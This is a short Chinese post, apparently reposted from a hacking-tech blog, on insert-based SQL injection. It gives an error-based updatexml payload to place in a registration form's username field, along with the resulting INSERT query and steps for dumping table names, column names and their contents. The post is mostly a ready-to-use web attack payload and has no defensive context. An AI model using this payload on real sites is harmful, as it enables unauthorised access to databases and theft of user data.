SQL注入之insert注入

黑客街搬运工 2019年2月27日 黑客技术 0

insert注入:

insert into member(username,pw,sex,phonenum,email,address) values('wangwu'or updatexml(1,concat(0x7e,(users())),0) or'',md5('a'),'a','aa','a','a')

在用户名输入:

payload

wangwu'or updatexml(1,concat(0x7e,(命令)),0) or'

1. 爆表名

2. 爆列名

3. 爆内容